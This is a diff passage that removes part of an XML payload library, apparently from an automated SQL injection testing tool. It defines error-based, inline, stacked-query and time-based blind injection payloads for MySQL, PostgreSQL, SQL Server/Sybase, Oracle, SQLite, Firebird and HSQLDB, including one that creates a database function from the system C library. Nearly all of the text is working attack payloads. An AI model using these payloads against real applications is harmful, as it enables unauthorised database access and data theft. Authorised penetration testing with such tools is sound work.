-            <dbms_version>&gt;= 5.5</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
-        <request>
-            <payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>3</clause>
-        <where>1</where>
-        <vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
-        <request>
-            <payload>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-    <!--
-         TODO: if possible, add payload for SQLite, Microsoft Access
-         and SAP MaxDB - no known techniques at this time
-    -->
-    <!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
-
-    <!-- Inline queries tests -->
-    <test>
-        <title>MySQL inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
-        <request>
-            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-        </details>
-    </test>
-    <test>
-        <title>Firebird inline queries</title>
-        <stype>6</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
-        <request>
-            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-    <!-- End of inline queries tests -->
-
-    <!-- Stacked queries tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
-        <stype>4</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
-        <stype>4</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries</title>
-        <stype>4</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>; SELECT SLEEP([SLEEPTIME])</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 stacked queries</title>
-        <stype>4</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
-        <stype>4</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&lt; 8.2</dbms_version>
-            <os>Linux</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase stacked queries</title>
-        <stype>4</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
-        <request>
-            <payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
-        <request>
-            <payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
-        <request>
-            <payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
-        <request>
-            <payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
-        <request>
-            <payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
-        <request>
-            <payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
-        <stype>4</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
-        <request>
-            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 2.0 stacked queries</title>
-        <stype>4</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
-        <request>
-            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
-    <!-- End of stacked queries tests -->
-
-
-    <!-- AND time-based blind tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
-        <request>
-            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
